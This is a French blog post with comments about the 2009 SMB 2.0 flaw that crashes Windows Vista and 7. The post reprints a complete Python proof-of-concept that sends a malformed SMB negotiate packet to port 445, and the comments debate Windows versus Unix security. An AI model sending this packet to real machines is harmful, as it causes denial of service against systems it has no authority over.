Une faille Windows Vista et Seven aberrante

29/09/2009

Ho que c’est bon quand on est Linuxien ou Maceux et qu’on entend ce genre de choses ! C’est Nicolas Kandel, un collègue de boulot, qui vient de me parler de ça. Une faille sur Vista et Windows Seven sur le protocole SMB 2.0 (vous savez, le partage de dossier) qui permet à quiconque sur le réseau local de planter votre machine. Et ce avec un simple script python de 7 lignes !!!

Oui, 7 lignes… La page qui parle de ça se trouve ici http://seclists.org/fulldisclosure/2009/Sep/0039.html. 7 lignes de python (en fait un peu plus car le paquet envoyé est mise en forme pour être plus lisible) et voilà que le Vista ciblé vous présente un écran bleu (la tradition est importante chez Microsoft) et un redémarrage s’impose.

Le pire dans tout cela, c’est que vous, utilisateur de Vista ou Seven, n’y pouvez rien :) oui je souris, désolé.

Alors pour vous, voici le script: ` #!/usr/bin/python

When SMB2.0 recieve a “&” char in the “Process Id High” SMB header field it dies with a

PAGE_FAULT_IN_NONPAGED_AREA from socket import socket

from time import sleep

host = “IP_ADDR”, 445 buff = ( “\x00\x00\x00\x90” # Begin SMB header: Session message “\xff\x53\x4d\x42” # Server Component: SMB “\x72\x00\x00\x00” # Negociate Protocol “\x00\x18\x53\xc8” # Operation 0x18 & sub 0xc853 “\x00\x26”# Process ID High: --> :) normal value should be “\x00\x00” “\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xfe” “\x00\x00\x00\x00\x00\x6d\x00\x02\x50\x43\x20\x4e\x45\x54” “\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31” “\x2e\x30\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00” “\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57” “\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61” “\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x02\x4c” “\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x20\x4c” “\x4d\x20\x30\x2e\x31\x32\x00\x02\x53\x4d\x42\x20\x32\x2e” “\x30\x30\x32\x00”

) s = socket()

s.connect(host) s.send(buff) s.close() `

Si vous lisez le commentaire au début de script, vous allez comprendre… en fait l’attaquant place un “&” à la place de “0” dans l’ID de processus.

Sachant que la durée de vie d’un PC sans protection sur internet est de 4 minutes et voyant ce genre de faille… je suis heureux de ne pas avoir de Windows depuis plus de 9 ans.

Alors quand vous en aurez marre de voir ce genre d’aberration, passez à Linux: Fedora, Ubuntu, ou encore http://www.debian.org/index.fr.html. Et pour ceux qui veulent autre chose que Linux, pensez à FreeBSD ou OpenBSD qui sont eux aussi des Unix.

Bref, pour ma part, je me conforte jour après jour de mon choix ! A vous de jouer !

Ça peut vous intéresser aussi


Reconnaissance vocale sous Linux et Vista

Je cherchais des logiciels pour linux qui me permettrait de ...


Anti Mac

Il n’y a que les imbéciles qui ne changent ...


Du troll au débat Windows vs Linux

Gros débat sur le canal IRC #copix, un de nous ...


Orange et Linux

Je venais de dire à un collègue dans la journée ...

Merci de m'aider à financer mes services

Si vous avez apprécié cet article, je vous serai reconnaissant de m'aider à me payer une petite bière :)

Si vous voulez en savoir plus sur l'utilisation de flattr sur mon blog, lisez cette page: Ayez pitié de moi

Commentaires

Ajouter un commentaire

Lowcraft - 13/10/2009

Salut,

En effet, rien n’est moins sécurisé que windows, mais bon, dans l’espoir que cette faille puisse être colmater un jour, …

Pour ma part je louche plus sur les systèmes mac que linux, une préférence esthétique, peut être, ou de simplicité d’utilisation, même si j’ai travaillé 3 ans avec un bon debian et un e16 sans soucis (avec quelques moultes petites applis et softs sympa, genre blender ;) ). Mais le prix me fait encore réfléchir, surtout que je suis pluridisciplinaire, bon, c’est mon boulot qui veut ça, et je devrais débourser un max pour le hard, autant que pour le soft.

mitsu - 13/10/2009

c’est dommage de taunt sans trop chercher… au moment ou tu publiait ton blog, 7 était patché. Les failles existent sur tous les OS. Ce n’est pas une spécificité de windows. Ce genre d’“aberration”, tu en trouve sous linux, sur mac (tient, le coup du bug qui supprime le profil, c’est pas énorme ça ? tu n’en parle pas ? )

Là ou windows pêche c’est dans la vitesse de correction de ses failles. Bien qu’ils se soient améliorés, ils sont encore loin de la réactivité du monde libre la dessus. (Je parle même pas de la transparence)

Pour ce qui est de cette faille, le plus amusant, c’est que c’est un patch de sécurité qui l’a créé.

Bref, ça manque de lucidité et de recul, tout ça, dommage.

Metal3d - 31/10/2009

houlla houlla, pas d’amalgame cher Mitsu !

En premier lieu, je parle pas de bug mais de faille, tu me diras “il n’y a qu’un pas” mais je précise que le bug implique une erreur logiciel qui impact un fonctionnement, et ça des bugs y’en a et y’en aura dans tout OS.

Par contre une faille laisse libre court à un attaquant de pourrir un système. Là par contre, Windows n’est pas à la bourre, il est carrément à la rue. Avoue que les Unix ont largement moins de souci de ce genre que les Windows.

Ok, un patch est tombé alors que je rédigeai le post, mais cela n’empêche pas que cette faille date de pas mal de temps et comme tu le précise, M$ à mis du temps (comme d’habitude) à réparer cette crasse.

Là où je ne te suis pas, c’est sur ma lucidité. Après pas mal de temps passé dans le monde de l’informatique, je n’ai de cesse que de voir et entendre des nouvelles presques tous les mois sur une faille découverte, un bug ancestral jamais réparé, ou encore des super virus de la mort… je ne fais que rapporter une news parmis des centaines qui tombent régulièrement. Ce n’est pas un taunt trollé mais un exemple de ce que risque un utilisateur mal informé.

Du recul, j’en prend. Mais force est de constater que (bon sang) on ne trouve pas autant de conneries de ce genre sur les systèmes Unix. On en trouve, mais pas avec cette fréquence ni cette récurrence.

Bref, ce post était aussi là pour présenter l’autre lien, à lire, qui montre la faiblesse de Windows (4 minutes de vie si pas de protection). Je trouve que c’est dommage de vouloir défendre l’indéfendable :)

PS: Je parle de Unix en incluant Linux dedans, certains hurleront “Unix Like” mais nous sommes de plus en plus à penser que Linux, comme tout Unix actuel, est autant Unix que les autres… Je m’expliquerai bientôt dans un autre post sur ce sujet et vous pourrez en discuter avec moi.

Mitsu, trolleur mou - 05/11/2009

Re ^^ Alors, pour reprendre ce que je disais, c’est que des failles plus ou moins grosses sous linux, ça existe. Tu conseille debian par exemple, distrib orientée justement sur la fiabilité plutôt que la nouveauté. ça ne les a pourtant pas empêchés de créer une énorme faille dans SSL en voulant justement en corriger une - qui n’en était pas. Tout un tas de noyau, jusqu’au 2.6.30.4 avaient une faille permettant facilement d’obtenir les droits root pour peu qu’on dispose d’une connexion locale. A mon avis pas mal de serveurs d’hebergements sont concernés… La preuve, je bosse sur un serveur avec un noyau 2.6.26 … bon, je suis root dessus, mais pour les mutualisés avec acces ssh, y’a surement de quoi s’amuser. (cf http://www.tux-planet.fr/linux-kernel-2-x-sock_sendpage-local-root-exploit/ )

Bref, de bonnes grosses failles bien grasse, ça existe de partout, c’est pas une spécificité windows, c’est pas plus une “abhération” que la modification d’un algo de sécurité parce qu’il fait des warning à la compilation (modif qui rende casse l’aléatoire de l’algo au passage, youpi.

Pour ce qui est du site la durée de vie d’un pc, blabla. Si on va voir comment il calcul ça, il écoute les attaques, dès qu’il en reçoit une, il se considère comme vérolé. Alors ok, si tu installe aujourd’hui un windows XP sans aucun service pack (ça se trouve encore, ça ? ) et en n’ayant pas une box qui te sert de routeur et bloquant directement ce genre d’attaque…. Alors oui, dans ce cas, tu va te faire infecter en 4 mn.

Ce n’est pas parce qu’il y a un grand nombre de PC zombi qui spament des attaques que la durée de vie d’un PC sur le net baisse. Je ne suis absolument pas d’accord avec ce raisonnement, complètement biaisé.

Par contre si tu prends - logiquement - le dernier OS de microsoft, il vérifie si il à des mise à jour à faire lors de l’installation, possède un firewall (Ahah ^^’ ) et n’est pas forcement vulnérable aux attaques détectée par ce site. Tu as des mises à jours de sécurité très régulièrement, et un mode de sécurité infâme vu que sous windows, pendant longtemps, si tu n’était pas admin de ta machine, tu ne pouvait rien faire (mais genre même pas lancer une appli, vive les progs a la con) donc maintenant, quand tu es admin, tu as en plus une surcouche qui te demande validation pour toutes les action d’administration. Bref, niveau sécurité Microsoft ne sont plus autant à la rue que tu le laisse croire, ni qu’ils étaient il y’à quelques années.

Le réel problème du système de microsoft c’est qu’il est propriétaire et fermé, même si ces derniers temps MS fait de quelques pas tremblant dans le libre . On peut aussi critiquer leur politique monopolistique…

Pointer du doigt une faille d’un niveau relativement faible, point de vue sécurité (réseau local, ne fait que planter la machine…) en parlant d’absurdité (comme si ce n’était pas quelque chose de courant, les failles, sur les OS) et en citant une analyse de la durée de vie d’un PC en tenant leur raisonnement pour objectif… voilà ce que j’appelle ton manque de lucidité pour le coup, vu que ton billet est un gros troll velu. :D

Ajouter un commentaire

(*) Votre e-mail ne sera ni revendu, ni rendu public, ni utilisé pour vous proposer des mails commerciaux. Il n'est utilisé que pour vous contacter en cas de souci avec le contenu du commentaire, ou pour vous prévenir d'un nouveau commentaire si vous avez coché la case prévue à cet effet.